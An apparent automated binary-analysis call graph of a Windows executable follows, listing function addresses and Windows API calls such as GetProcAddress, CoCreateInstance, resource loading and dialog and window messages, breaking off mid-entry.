87656->87662 87668 7ff678625360 134 API calls 87656->87668 87663 7ff678625360 134 API calls 87657->87663 87670 7ff6786251e0 134 API calls 87658->87670 87675 7ff678620b24 87658->87675 87665 7ff67861e463 87659->87665 87666 7ff678625360 134 API calls 87660->87666 87690 7ff6786206eb 87661->87690 87667 7ff67861f33e 87662->87667 87681 7ff6786251e0 134 API calls 87662->87681 87669 7ff67861eeea 87663->87669 87683 7ff678620757 87664->87683 87679 7ff678626360 134 API calls 87665->87679 87710 7ff678620916 87666->87710 87667->87647 87672 7ff67861f3ab 87667->87672 87674 7ff67861ef97 87668->87674 87688 7ff678626360 134 API calls 87669->87688 87677 7ff678620abc 87670->87677 87671 7ff678620a2d 87694 7ff678626360 134 API calls 87671->87694 87680 7ff678625360 134 API calls 87672->87680 87700 7ff67861f394 87673->87700 87698 7ff678626360 134 API calls 87674->87698 87676 7ff678620cb6 87675->87676 87687 7ff6786251e0 134 API calls 87675->87687 87676->87185 87678 7ff678625360 134 API calls 87677->87678 87709 7ff678620ad5 87678->87709 87684 7ff67861e490 87679->87684 87686 7ff67861f3cb 87680->87686 87689 7ff67861f106 87681->87689 87697 7ff678625800 134 API calls 87682->87697 87699 7ff678625800 134 API calls 87683->87699 87691 7ff678625360 134 API calls 87684->87691 87685 7ff67861fe5a 87696 7ff6786251e0 134 API calls 87685->87696 87692 7ff678625680 134 API calls 87686->87692 87693 7ff678620b59 87687->87693 87688->87644 87695 7ff678625360 134 API calls 87689->87695 87707 7ff678625800 134 API calls 87690->87707 87737 7ff67861e4a9 87691->87737 87701 7ff67861f3e7 87692->87701 87702 7ff678625360 134 API calls 87693->87702 87703 7ff678620a5a 87694->87703 87704 7ff67861f122 87695->87704 87705 7ff67861fe73 87696->87705 87706 7ff67861eaee 87697->87706 87708 7ff67861efca 87698->87708 87726 7ff6786207a9 87699->87726 87700->87685 87711 7ff6786251e0 134 API calls 87700->87711 87712 7ff6786262b0 134 API calls 87701->87712 87729 7ff678620b6e 87702->87729 87724 7ff678626360 134 API calls 87703->87724 88318 7ff678625f20 134 API calls 87704->88318 87713 7ff678625360 134 API calls 87705->87713 87714 7ff678625680 134 API calls 87706->87714 87707->87655 87715 7ff6786262b0 134 API calls 87708->87715 87720 7ff678625800 134 API calls 87709->87720 87710->87671 87721 7ff678625a00 134 API calls 87710->87721 87716 7ff67861f594 87711->87716 87717 7ff67861f400 87712->87717 87718 7ff67861fe8c 87713->87718 87733 7ff67861eb08 87714->87733 87719 7ff67861efdc 87715->87719 87722 7ff678625360 134 API calls 87716->87722 87723 7ff6786255e0 134 API calls 87717->87723 87732 7ff678626360 134 API calls 87718->87732 87731 7ff678626360 134 API calls 87719->87731 87720->87675 87755 7ff6786209b3 87721->87755 87727 7ff67861f5ad 87722->87727 87728 7ff67861f414 87723->87728 87724->87658 87736 7ff678625800 134 API calls 87726->87736 88321 7ff678625f20 134 API calls 87727->88321 87741 7ff678625c30 134 API calls 87728->87741 87738 7ff678625800 134 API calls 87729->87738 87730 7ff67861f159 87742 7ff678626360 134 API calls 87730->87742 87735 7ff67861f005 87731->87735 87734 7ff67861febf 87732->87734 87739 7ff678625800 134 API calls 87733->87739 87747 7ff678626360 134 API calls 87734->87747 87748 7ff678626360 134 API calls 87735->87748 87753 7ff6786207f1 87736->87753 87749 7ff678625a00 134 API calls 87737->87749 87771 7ff678620bbd 87738->87771 87743 7ff67861eb57 87739->87743 87745 7ff67861f445 87741->87745 87746 7ff67861f18d 87742->87746 87757 7ff678626360 134 API calls 87743->87757 87744 7ff67861f5e4 87760 7ff678626360 134 API calls 87744->87760 87761 7ff678625d10 134 API calls 87745->87761 87750 7ff678625360 134 API calls 87746->87750 87751 7ff67861fee8 87747->87751 87752 7ff67861f02e 87748->87752 87754 7ff67861e561 87749->87754 87766 7ff67861f1a6 87750->87766 87756 7ff678625680 134 API calls 87751->87756 87758 7ff678625360 134 API calls 87752->87758 87763 7ff678625800 134 API calls 87753->87763 87769 7ff678625360 134 API calls 87754->87769 87759 7ff678625a00 134 API calls 87755->87759 87762 7ff67861ff09 87756->87762 87786 7ff67861eb80 87757->87786 87787 7ff67861f047 87758->87787 87759->87671 87764 7ff67861f614 87760->87764 87765 7ff67861f47a 87761->87765 87767 7ff6786262b0 134 API calls 87762->87767 87768 7ff67862083d 87763->87768 87764->87685 87773 7ff6786251e0 134 API calls 87764->87773 87774 7ff678625800 134 API calls 87766->87774 87772 7ff67861ff22 87767->87772 87778 7ff678625e10 134 API calls 87768->87778 87782 7ff67861e599 87769->87782 87780 7ff678625a00 134 API calls 87771->87780 87776 7ff67861f636 87773->87776 87789 7ff67861f1ff 87774->87789 87779 7ff678625360 134 API calls 87776->87779 87781 7ff67862087d 87778->87781 87783 7ff67861f64b 87779->87783 87785 7ff678620c5c 87780->87785 87797 7ff678625e10 134 API calls 87781->87797 87792 7ff678625800 134 API calls 87782->87792 87793 7ff678626360 134 API calls 87783->87793 87795 7ff678626360 134 API calls 87785->87795 87802 7ff678625a00 134 API calls 87786->87802 87791 7ff678625a00 134 API calls 87787->87791 87801 7ff678625800 134 API calls 87789->87801 87791->87662 87798 7ff67861e5ee 87792->87798 87799 7ff67861f67b 87793->87799 87800 7ff678620c89 87795->87800 87797->87643 87803 7ff6786251e0 134 API calls 87798->87803 87810 7ff678626360 134 API calls 87800->87810 87816 7ff67861ec1f 87802->87816 87804 7ff67861e607 87803->87804 87807 7ff678625360 134 API calls 87804->87807 87823 7ff67861e620 87807->87823 87810->87676 87822 7ff678625800 134 API calls 87816->87822 87840 7ff67861ec6e 87822->87840 87846 7ff678625800 134 API calls 87840->87846 87852 7ff67861ecb6 87846->87852 88017 7ff678623f47 88016->88017 88018 7ff678623ec2 88016->88018 88019 7ff678625360 134 API calls 88017->88019 88020 7ff678625360 134 API calls 88018->88020 88021 7ff678623f6b 88019->88021 88022 7ff678623edd 88020->88022 88023 7ff678626360 134 API calls 88021->88023 88024 7ff678625c30 134 API calls 88022->88024 88028 7ff678623fa2 memcpy_s 88023->88028 88026 7ff678623f0e 88024->88026 88025 7ff678625360 134 API calls 88027 7ff678624034 88025->88027 88026->88017 88029 7ff678625c30 134 API calls 88026->88029 88030 7ff678626360 134 API calls 88027->88030 88028->88025 88029->88017 88031 7ff678624064 88030->88031 88032 7ff678626360 134 API calls 88031->88032 88033 7ff678624091 88032->88033 88034 7ff678625360 134 API calls 88033->88034 88036 7ff6786240ae 88034->88036 88035 7ff6786241be 88037 7ff678626020 134 API calls 88035->88037 88036->88035 88038 7ff678624112 88036->88038 88346 7ff67869b8ac 98 API calls 4 library calls 88036->88346 88045 7ff678624229 88037->88045 88040 7ff678613530 134 API calls 88038->88040 88154 7ff6786134f0 134 API calls 88153->88154 88155 7ff678624f16 88154->88155 88155->87248 88156->87255 88157->87258 88158->87258 88159->87258 88161 7ff6786134f0 134 API calls 88160->88161 88162 7ff678625570 88161->88162 88163 7ff6786135a0 134 API calls 88162->88163 88164 7ff678625598 88163->88164 88165 7ff678613530 134 API calls 88164->88165 88166 7ff67861bd92 88165->88166 88167 7ff67861a3a0 88166->88167 88168 7ff67861a3ab 88167->88168 88170 7ff67861a3c6 88167->88170 88169 7ff6786134f0 134 API calls 88168->88169 88169->88170 88170->87264 88176 7ff67862538d 88171->88176 88172 7ff6786134f0 134 API calls 88173 7ff678625481 88172->88173 88174 7ff67861a3a0 134 API calls 88173->88174 88175 7ff67862548c 88174->88175 88177 7ff67861a3a0 134 API calls 88175->88177 88176->88172 88181 7ff678625464 memcpy_s 88176->88181 88178 7ff678625497 88177->88178 88179 7ff6786254aa 88178->88179 88182 7ff67861a3a0 134 API calls 88178->88182 88180 7ff6786135a0 134 API calls 88179->88180 88180->88181 88181->87266 88182->88179 88184 7ff6786134f0 134 API calls 88183->88184 88185 7ff6786256b7 88184->88185 88186 7ff6786135a0 134 API calls 88185->88186 88187 7ff6786256df 88186->88187 88188 7ff678625742 88187->88188 88326 7ff67869b8ac 98 API calls 4 library calls 88187->88326 88189 7ff6786134f0 134 API calls 88188->88189 88193 7ff67862574d 88188->88193 88189->88193 88191 7ff67868a9f0 swprintf 8 API calls 88192 7ff6786257f0 88191->88192 88192->87268 88193->88191 88195 7ff6786134f0 134 API calls 88194->88195 88196 7ff678625c69 88195->88196 88197 7ff6786135a0 134 API calls 88196->88197 88198 7ff678625c91 88197->88198 88199 7ff67861a3a0 134 API calls 88198->88199 88200 7ff678625ce2 88198->88200 88199->88200 88200->87270 88202 7ff6786134f0 134 API calls 88201->88202 88209 7ff67862520e 88202->88209 88203 7ff67861a3a0 134 API calls 88204 7ff6786252a4 88203->88204 88205 7ff67861a3a0 134 API calls 88204->88205 88206 7ff6786252b9 88205->88206 88207 7ff6786135a0 134 API calls 88206->88207 88208 7ff6786252fd memcpy_s 88207->88208 88208->87276 88209->88203 88211 7ff6786134f0 134 API calls 88210->88211 88212 7ff67862584d 88211->88212 88213 7ff6786135a0 134 API calls 88212->88213 88214 7ff678625875 88213->88214 88215 7ff67861c346 88214->88215 88216 7ff67861a3a0 134 API calls 88214->88216 88215->87293 88216->88215 88218 7ff6786134f0 134 API calls 88217->88218 88219 7ff678625d49 88218->88219 88220 7ff6786135a0 134 API calls 88219->88220 88221 7ff678625d71 88220->88221 88222 7ff678625dc2 88221->88222 88223 7ff67861a3a0 134 API calls 88221->88223 88222->87307 88223->88222 88225 7ff6786134f0 134 API calls 88224->88225 88226 7ff678625a52 88225->88226 88227 7ff6786135a0 134 API calls 88226->88227 88228 7ff678625a7a 88227->88228 88229 7ff678625ad0 88228->88229 88230 7ff67861a3a0 134 API calls 88228->88230 88231 7ff678625b3a 88229->88231 88232 7ff6786134f0 134 API calls 88229->88232 88230->88229 88233 7ff6786134f0 134 API calls 88231->88233 88232->88231 88234 7ff678625b6a 88233->88234 88235 7ff6786134f0 134 API calls 88234->88235 88240 7ff678625b7f 88235->88240 88236 7ff678625c04 88237 7ff67868a9f0 swprintf 8 API calls 88236->88237 88238 7ff67861c542 88237->88238 88238->87338 88239 7ff67861a3a0 134 API calls 88239->88240 88240->88236 88240->88239 88242 7ff6786134f0 134 API calls 88241->88242 88243 7ff67862606d 88242->88243 88244 7ff6786135a0 134 API calls 88243->88244 88245 7ff678626095 88244->88245 88246 7ff6786260e6 88245->88246 88247 7ff67861a3a0 134 API calls 88245->88247 88248 7ff67861a3a0 134 API calls 88246->88248 88247->88246 88249 7ff67861c70e 88248->88249 88250 7ff6786262b0 88249->88250 88251 7ff6786134f0 134 API calls 88250->88251 88252 7ff6786262d4 88251->88252 88253 7ff6786135a0 134 API calls 88252->88253 88254 7ff6786262fc 88253->88254 88255 7ff67861a3a0 134 API calls 88254->88255 88256 7ff67862634b 88255->88256 88256->87351 88258 7ff6786134f0 134 API calls 88257->88258 88259 7ff678626399 88258->88259 88260 7ff6786135a0 134 API calls 88259->88260 88261 7ff6786263c1 88260->88261 88262 7ff678626412 88261->88262 88263 7ff67861a3a0 134 API calls 88261->88263 88262->87355 88263->88262 88265 7ff6786134f0 134 API calls 88264->88265 88266 7ff67862594d 88265->88266 88267 7ff6786135a0 134 API calls 88266->88267 88269 7ff678625975 88267->88269 88268 7ff67861cc0e 88268->87392 88269->88268 88270 7ff67861a3a0 134 API calls 88269->88270 88270->88268 88272 7ff6786134f0 134 API calls 88271->88272 88273 7ff678626169 88272->88273 88274 7ff6786135a0 134 API calls 88273->88274 88275 7ff678626191 88274->88275 88276 7ff67861d8cd 88275->88276 88277 7ff67861a3a0 134 API calls 88275->88277 88276->87496 88277->88276 88279 7ff6786134f0 134 API calls 88278->88279 88280 7ff678625e53 88279->88280 88281 7ff6786135a0 134 API calls 88280->88281 88282 7ff678625e7b 88281->88282 88283 7ff678625ecc 88282->88283 88284 7ff67861a3a0 134 API calls 88282->88284 88283->87551 88284->88283 88286 7ff6786134f0 134 API calls 88285->88286 88287 7ff6786255fc 88286->88287 88288 7ff6786135a0 134 API calls 88287->88288 88289 7ff678625624 88288->88289 88290 7ff678613530 134 API calls 88289->88290 88291 7ff67862563b 88290->88291 88291->87565 88311 7ff678613540 88309->88311 88313 7ff678613569 88311->88313 88345 7ff67864a910 134 API calls 88311->88345 88313->87320 88314->87325 88315->87337 88316->87337 88317->87332 88318->87730 88321->87744 88326->88188 88346->88038 88364 7ff67861151b 88363->88364 88367 7ff678611534 88363->88367 88375 7ff67869b8ac 98 API calls 4 library calls 88364->88375 88366 7ff67861155a 88369 7ff6786157e0 98 API calls 88366->88369 88367->88366 88376 7ff67869b8ac 98 API calls 4 library calls 88367->88376 88370 7ff67861156e 88369->88370 88371 7ff67861158f 88370->88371 88377 7ff67869b8ac 98 API calls 4 library calls 88370->88377 88373 7ff67868a9f0 swprintf 8 API calls 88371->88373 88374 7ff6785dcb6b 88373->88374 88374->87074 88374->87078 88375->88367 88376->88366 88377->88371 88378->87213 88379->87215 88380->87223 88381 7ff6785f52e0 88382 7ff6785f5311 88381->88382 88386 7ff6785f5364 88381->88386 88383 7ff6785f51e0 4 API calls 88382->88383 88383->88386 88384 7ff67868a9f0 swprintf 8 API calls 88385 7ff6785f5500 88384->88385 88387 7ff6785f51e0 4 API calls 88386->88387 88390 7ff6785f536d 88386->88390 88388 7ff6785f5404 88387->88388 88389 7ff6785f51e0 4 API calls 88388->88389 88388->88390 88389->88388 88390->88384 88391 7ff6785fb080 88392 7ff6785fb0af 88391->88392 88397 7ff6785fb08e 88391->88397 88394 7ff6786162c0 134 API calls 88392->88394 88393 7ff6785fb0e7 88395 7ff6785fb0bb 88394->88395 88395->88397 88398 7ff6785fb0c7 GetProcAddress 88395->88398 88396 7ff6785fb09f SetCurrentProcessExplicitAppUserModelID 88396->88393 88397->88393 88397->88396 88398->88397 88399 7ff6785d51df RegisterClipboardFormatA 88426 7ff6785dd100 88399->88426 88402 7ff6786162c0 134 API calls 88403 7ff6785d520d 88402->88403 88404 7ff6786162c0 134 API calls 88403->88404 88405 7ff6785d521c 88404->88405 88406 7ff6786162c0 134 API calls 88405->88406 88407 7ff6785d522b GetProcAddress GetProcAddress 88406->88407 88409 7ff6785d5268 GetProcAddress 88407->88409 88411 7ff6785d5288 GetProcAddress GetProcAddress GetProcAddress 88409->88411 88413 7ff6785d52e7 GetProcAddress 88411->88413 88415 7ff6785d5307 GetProcAddress GetProcAddress 88413->88415 88417 7ff6785d5348 88415->88417 88445 7ff678611020 88417->88445 88420 7ff6785d5368 88421 7ff678612890 134 API calls 88420->88421 88422 7ff6785d537b MessageBoxA 88421->88422 88423 7ff6785d539e 88422->88423 88424 7ff67868a9f0 swprintf 8 API calls 88423->88424 88425 7ff6785d53ae 88424->88425 88427 7ff6785dd114 88426->88427 88428 7ff6785d5201 88426->88428 88429 7ff6786162c0 134 API calls 88427->88429 88428->88402 88430 7ff6785dd127 88429->88430 88431 7ff6785dd12f GetProcAddress 88430->88431 88432 7ff6785dd176 88430->88432 88433 7ff6785dd181 FreeLibrary 88431->88433 88434 7ff6785dd14b 88431->88434 88432->88433 88436 7ff6785dd190 FindResourceA 88433->88436 88435 7ff6785dd1f1 88434->88435 88434->88436 88438 7ff6785dd168 88434->88438 88435->88428 88450 7ff6786169b0 135 API calls 88435->88450 88436->88435 88437 7ff6785dd1b9 SizeofResource 88436->88437 88437->88435 88439 7ff6785dd1cb LoadResource 88437->88439 88438->88437 88440 7ff6785dd174 88438->88440 88439->88435 88441 7ff6785dd1df LockResource 88439->88441 88440->88435 88441->88435 88443 7ff6785dd217 88443->88428 88451 7ff6786169b0 135 API calls 88443->88451 88446 7ff6786134f0 134 API calls 88445->88446 88447 7ff678611037 88446->88447 88452 7ff678614a20 88447->88452 88450->88443 88451->88428 88453 7ff6786134f0 134 API calls 88452->88453 88454 7ff6785d5354 CoInitialize 88453->88454 88454->88420 88455 7ff6785f6f7c 88456 7ff6785f77ce 88455->88456 88457 7ff6785f6f87 88455->88457 88459 7ff6785f51e0 4 API calls 88456->88459 88508 7ff6785f5520 GetDC 88457->88508 88460 7ff6785f7824 SetDlgItemTextA 88459->88460 88526 7ff67861b550 6 API calls 88460->88526 88462 7ff6785f77b4 88463 7ff6785f51e0 4 API calls 88462->88463 88466 7ff6785f7850 88463->88466 88464 7ff6785f6fa4 88464->88462 88465 7ff6786134f0 134 API calls 88464->88465 88467 7ff6785f6fd2 88465->88467 88468 7ff6786134f0 134 API calls 88466->88468 88491 7ff6785f68b4 88466->88491 88467->88462 88524 7ff6786a11ac 63 API calls 88467->88524 88469 7ff6785f7fd3 88468->88469 88471 7ff6785f802f 88469->88471 88473 7ff678614b00 134 API calls 88469->88473 88472 7ff678614b00 134 API calls 88471->88472 88475 7ff6785f8040 88472->88475 88474 7ff6785f8011 88473->88474 88474->88471 88527 7ff67869b8ac 98 API calls 4 library calls 88474->88527 88484 7ff6785f805e 88475->88484 88528 7ff67869b8ac 98 API calls 4 library calls 88475->88528 88476 7ff6785f6fee 88476->88462 88525 7ff6786a11ac 63 API calls 88476->88525 88480 7ff6785f84ac 88483 7ff67868a9f0 swprintf 8 API calls 88480->88483 88482 7ff6785f83b8 88482->88480 88486 7ff6785f51e0 4 API calls 88482->88486 88487 7ff6785f84c1 88483->88487 88499 7ff6785f80d0 88484->88499 88529 7ff6786a11ac 63 API calls 88484->88529 88530 7ff67869b8ac 98 API calls 4 library calls 88484->88530 88485 7ff67869b8ac 98 API calls 88485->88491 88486->88480 88489 7ff6786157e0 98 API calls 88489->88499 88490 7ff6785f851c 88535 7ff67869b8ac 98 API calls 4 library calls 88490->88535 88491->88482 88491->88485 88491->88490 88493 7ff6785f8150 GetDlgItem 88493->88499 88494 7ff6785f8535 88536 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 88494->88536 88498 7ff6785f853a 88499->88489 88499->88491 88499->88493 88504 7ff6785f81c0 88499->88504 88531 7ff67869b8ac 98 API calls 4 library calls 88499->88531 88532 7ff67869b8ac 98 API calls 4 library calls 88499->88532 88500 7ff6786157e0 98 API calls 88500->88504 88501 7ff6785f828e GetDlgItem 88501->88504 88504->88491 88504->88500 88504->88501 88505 7ff6785f832c GetDlgItem 88504->88505 88506 7ff6785f834c ScreenToClient 88504->88506 88533 7ff67869b8ac 98 API calls 4 library calls 88504->88533 88534 7ff67869b8ac 98 API calls 4 library calls 88504->88534 88505->88504 88506->88504 88507 7ff6785f8380 SetWindowPos 88506->88507 88507->88504 88509 7ff6785f5567 88508->88509 88510 7ff6786134f0 134 API calls 88509->88510 88511 7ff6785f5578 88510->88511 88512 7ff6786134f0 134 API calls 88511->88512 88513 7ff6785f5594 SetMapMode MapDialogRect SendMessageA SelectObject 88512->88513 88514 7ff6785f57a4 SelectObject ReleaseDC 88513->88514 88515 7ff6785f5606 88513->88515 88516 7ff6785f57c6 88514->88516 88517 7ff6785f560e GetTextExtentExPointA 88515->88517 88518 7ff67868a9f0 swprintf 8 API calls 88516->88518 88521 7ff6785f5728 88517->88521 88522 7ff6785f5656 88517->88522 88519 7ff6785f57e1 88518->88519 88519->88464 88520 7ff67869ecc0 62 API calls 88520->88522 88521->88514 88522->88520 88522->88521 88523 7ff6785f573c GetTextExtentExPointA 88522->88523 88523->88521 88523->88522 88524->88476 88525->88476 88526->88466 88527->88471 88528->88484 88529->88484 88530->88484 88531->88493 88532->88499 88533->88501 88534->88504 88535->88494 88536->88498 88537 7ff678609090 88544 7ff67860cff0 RegCloseKey 88537->88544 88539 7ff678609098 88540 7ff6786090b1 88539->88540 88541 7ff6786125d0 98 API calls 88539->88541 88542 7ff6786090a5 88541->88542 88542->88540 88545 7ff6785faaf0 88542->88545 88544->88539 88546 7ff6785fab62 88545->88546 88547 7ff6785fab0c 88545->88547 88548 7ff67868a9f0 swprintf 8 API calls 88546->88548 88547->88546 88549 7ff6785fab17 88547->88549 88550 7ff6785fab6f 88548->88550 88574 7ff67860dd90 139 API calls swprintf 88549->88574 88550->88540 88552 7ff6785fab1c 88553 7ff6785fab75 88552->88553 88554 7ff6785fab20 CoCreateInstance 88552->88554 88555 7ff67868a9f0 swprintf 8 API calls 88553->88555 88554->88546 88556 7ff6785fab4a 88554->88556 88557 7ff6785fab82 wcsftime 88555->88557 88556->88546 88558 7ff6785faba6 CoCreateInstance 88557->88558 88559 7ff6785fac10 88558->88559 88560 7ff6785faefa 88558->88560 88559->88560 88561 7ff6785fac50 CoCreateInstance 88559->88561 88564 7ff67868a9f0 swprintf 8 API calls 88560->88564 88561->88560 88562 7ff6785fac7e 88561->88562 88575 7ff67860e020 139 API calls swprintf 88562->88575 88565 7ff6785fafcb 88564->88565 88565->88540 88567 7ff6785fadc8 88567->88560 88568 7ff6785fae07 CoCreateInstance 88567->88568 88568->88560 88570 7ff6785fae35 88568->88570 88569 7ff6785fb0f0 170 API calls 88569->88570 88570->88569 88572 7ff6785fae7f 88570->88572 88571 7ff6785fac83 88571->88567 88576 7ff6785fb0f0 88571->88576 88572->88560 88573 7ff6785faecc CoCreateInstance 88572->88573 88573->88560 88574->88552 88575->88571 88577 7ff6785fb195 GetModuleFileNameA 88576->88577 88578 7ff6785fb117 88576->88578 88579 7ff6785fb1b3 88577->88579 88583 7ff6785fb120 swprintf 88577->88583 88578->88579 88578->88583 88580 7ff67861a3a0 134 API calls 88579->88580 88581 7ff6785fb18e 88580->88581 88582 7ff6785fb1dc CoCreateInstance 88581->88582 88601 7ff6785fb193 88581->88601 88623 7ff67860cc60 88581->88623 88584 7ff6785fb206 88582->88584 88593 7ff6785fb230 88582->88593 88587 7ff678612890 134 API calls 88583->88587 88591 7ff6785fb23f 88584->88591 88592 7ff6785fb21c 88584->88592 88589 7ff6785fb16b 88587->88589 88588 7ff6785fb1d4 88633 7ff67860cff0 RegCloseKey 88588->88633 88621 7ff67869e168 117 API calls 3 library calls 88589->88621 88597 7ff67861a3a0 134 API calls 88591->88597 88596 7ff678612610 134 API calls 88592->88596 88598 7ff67868a9f0 swprintf 8 API calls 88593->88598 88595 7ff6785fb17d 88595->88593 88622 7ff67869d968 90 API calls _invalid_parameter_noinfo 88595->88622 88602 7ff6785fb22e 88596->88602 88597->88602 88599 7ff6785fb3c8 88598->88599 88599->88571 88601->88582 88603 7ff6785fb284 88602->88603 88604 7ff6785fb269 88602->88604 88606 7ff6785fb2a2 88603->88606 88634 7ff67869b8ac 98 API calls 4 library calls 88603->88634 88605 7ff678612610 134 API calls 88604->88605 88611 7ff6785fb282 88605->88611 88635 7ff67869fcd0 12 API calls swprintf 88606->88635 88609 7ff6785fb2b1 88610 7ff678612890 134 API calls 88609->88610 88610->88611 88612 7ff6785fb334 88611->88612 88613 7ff6785fb32a 88611->88613 88620 7ff6785fb332 88611->88620 88615 7ff6785fb352 88612->88615 88636 7ff67869b8ac 98 API calls 4 library calls 88612->88636 88614 7ff67861a3a0 134 API calls 88613->88614 88614->88620 88637 7ff67869fcd0 12 API calls swprintf 88615->88637 88618 7ff6785fb361 88619 7ff678612890 134 API calls 88618->88619 88619->88620 88620->88593 88621->88595 88622->88581 88624 7ff67860cc6c 88623->88624 88625 7ff678613bc0 134 API calls 88624->88625 88626 7ff67860cc80 88625->88626 88638 7ff67864a5e0 88626->88638 88629 7ff678616460 12 API calls 88630 7ff67860ccb8 88629->88630 88631 7ff6785fb1cf 88630->88631 88632 7ff6786134f0 134 API calls 88630->88632 88631->88588 88631->88593 88632->88631 88633->88582 88634->88606 88635->88609 88636->88615 88637->88618 88641 7ff67864a610 88638->88641 88639 7ff67860cc8e 88639->88629 88640 7ff678612ba0 8 API calls 88640->88641 88641->88639 88641->88640 88642 7ff678624d90 88643 7ff678624dd6 88642->88643 88644 7ff678624dc5 GetWindowLongPtrA 88642->88644 88647 7ff6785f2c60 88643->88647 88644->88643 88648 7ff6785f2c9f 88647->88648 88649 7ff6785f30e9 88647->88649 88651 7ff6785f2cae 88648->88651 88652 7ff6785f322f 88648->88652 88650 7ff6785f344e 88649->88650 88657 7ff6785f3113 SendMessageA SendMessageA SendMessageA 88649->88657 88655 7ff67868a9f0 swprintf 8 API calls 88650->88655 88653 7ff6785f329f 88651->88653 88654 7ff6785f2cbb 88651->88654 88652->88650 88660 7ff6785f324a KillTimer 88652->88660 88778 7ff6785f4ab0 154 API calls swprintf 88653->88778 88710 7ff6785f4a30 88654->88710 88659 7ff6785f345e 88655->88659 88689 7ff6785f3191 88657->88689 88776 7ff678616a00 185 API calls swprintf 88660->88776 88661 7ff6785f32af 88664 7ff67868a9f0 swprintf 8 API calls 88661->88664 88667 7ff6785f32c2 88664->88667 88666 7ff6785f3267 88669 7ff6785f3290 88666->88669 88670 7ff6785f326c MessageBoxA 88666->88670 88667->88659 88668 7ff6785f3474 88671 7ff6785f5130 11 API calls 88668->88671 88777 7ff678624e00 GetWindowLongPtrA 88669->88777 88670->88669 88690 7ff6785f34b0 88671->88690 88673 7ff6785f329a 88673->88650 88674 7ff6785f3218 GetDlgItem 88678 7ff6785f3227 DestroyWindow 88674->88678 88674->88689 88676 7ff6785f2d6c LoadIconA SendMessageA 88754 7ff678626440 GetDesktopWindow GetWindowRect 88676->88754 88678->88689 88679 7ff6785f3518 88684 7ff6785fa880 161 API calls 88679->88684 88683 7ff6785f3301 SendMessageA 88688 7ff6785f3318 88683->88688 88687 7ff6785f3522 SendMessageA InvalidateRect SetFocus 88684->88687 88685 7ff6785f2cfa 88685->88676 88720 7ff6785f65f0 88685->88720 88686 7ff6785f65f0 140 API calls 88686->88690 88687->88650 88779 7ff67869b8ac 98 API calls 4 library calls 88688->88779 88689->88668 88689->88674 88774 7ff6785f63b0 99 API calls 88689->88774 88775 7ff6785f6550 98 API calls 88689->88775 88690->88679 88690->88686 88692 7ff6785f32ca SendMessageA 88693 7ff6785f3331 88692->88693 88694 7ff6785f32ff 88692->88694 88695 7ff6785f5130 11 API calls 88693->88695 88694->88688 88702 7ff6785f3363 88695->88702 88697 7ff6785f33c8 88760 7ff6785fa880 88697->88760 88699 7ff6785f65f0 140 API calls 88699->88702 88701 7ff6785f2f39 memcpy_s swprintf 88701->88692 88704 7ff6785f3074 SendMessageA 88701->88704 88773 7ff67869b8ac 98 API calls 4 library calls 88701->88773 88702->88697 88702->88699 88703 7ff6785f33dc SetTimer 88707 7ff6785f33f3 88703->88707 88704->88701 88705 7ff6785f30af SendMessageA 88704->88705 88705->88701 88706 7ff6785f3438 ShowWindow 88706->88650 88707->88706 88709 7ff6785f342e 88707->88709 88767 7ff6785fa750 88707->88767 88709->88706 88711 7ff6785f4a45 SetWindowTextA 88710->88711 88712 7ff6785f4a4e 88710->88712 88711->88712 88713 7ff6785f4a82 GetDlgItem 88712->88713 88714 7ff6785f4a57 GetWindowLongPtrA SetWindowLongPtrA 88712->88714 88715 7ff6785f2cc6 88713->88715 88716 7ff6785f4a95 DestroyWindow 88713->88716 88714->88713 88717 7ff6785f5130 SendMessageA GetClientRect MapDialogRect 88715->88717 88716->88715 88718 7ff67868a9f0 swprintf 8 API calls 88717->88718 88719 7ff6785f51cf 88718->88719 88719->88685 88780 7ff678626590 88720->88780 88723 7ff6785f66c2 88725 7ff6786134f0 134 API calls 88723->88725 88731 7ff6785f6819 88723->88731 88724 7ff6786134f0 134 API calls 88727 7ff6785f666e 88724->88727 88726 7ff6785f672e 88725->88726 88728 7ff67861a3a0 134 API calls 88726->88728 88729 7ff678614b00 134 API calls 88727->88729 88730 7ff6785f674e 88728->88730 88732 7ff6785f66a4 88729->88732 88734 7ff6785f6789 88730->88734 88738 7ff678614b00 134 API calls 88730->88738 88733 7ff6785f83b8 88731->88733 88736 7ff67869b8ac 98 API calls 88731->88736 88746 7ff6785f851c 88731->88746 88732->88723 88785 7ff67869b8ac 98 API calls 4 library calls 88732->88785 88737 7ff6785f84ac 88733->88737 88743 7ff6785f51e0 4 API calls 88733->88743 88739 7ff678614b00 134 API calls 88734->88739 88736->88731 88741 7ff67868a9f0 swprintf 8 API calls 88737->88741 88740 7ff6785f676b 88738->88740 88742 7ff6785f6796 88739->88742 88740->88734 88786 7ff67869b8ac 98 API calls 4 library calls 88740->88786 88744 7ff6785f84c1 88741->88744 88745 7ff6785f67b4 88742->88745 88787 7ff67869b8ac 98 API calls 4 library calls 88742->88787 88743->88737 88744->88685 88749 7ff6785f51e0 4 API calls 88745->88749 88788 7ff67869b8ac 98 API calls 4 library calls 88746->88788 88749->88731 88751 7ff6785f8535 88789 7ff6785d7a30 100 API calls _invalid_parameter_noinfo 88751->88789 88753 7ff6785f853a 88755 7ff6786264dc 88754->88755 88756 7ff678626471 GetWindowRect 88754->88756 88758 7ff67868a9f0 swprintf 8 API calls 88755->88758 88756->88755 88757 7ff678626483 MoveWindow 88756->88757 88757->88755 88759 7ff6785f2da1 8 API calls 88758->88759 88759->88683 88759->88701 88762 7ff6785fa88f 88760->88762 88761 7ff6785f33d2 88761->88703 88761->88707 88762->88761 88790 7ff678621190 88762->88790 88808 7ff678620d10 88762->88808 88881 7ff678621260 88762->88881 88911 7ff6786213b0 88762->88911 88768 7ff6785fa795 88767->88768 88770 7ff6785fa75f 88767->88770 88768->88706 88769 7ff6786157e0 98 API calls 88769->88770 88770->88768 88770->88769 88771 7ff6785fa79f GetDlgItem SetFocus 88770->88771 88773->88701 88774->88689 88775->88689 88776->88666 88777->88673 88778->88661 88779->88693 88781 7ff6786265a3 88780->88781 88782 7ff6785f6641 88780->88782 88781->88782 88783 7ff6786134f0 134 API calls 88781->88783 88782->88723 88782->88724 88782->88731 88784 7ff6786265d9 88783->88784 88785->88723 88786->88734 88787->88745 88788->88751 88789->88753 88791 7ff6786211d9 88790->88791 88794 7ff6786211a6 88790->88794 88969 7ff6785f9920 135 API calls swprintf 88791->88969 88793 7ff67862120c 88793->88762 88794->88793 88795 7ff678611360 98 API calls 88794->88795 88797 7ff6786211b8 88795->88797 88796 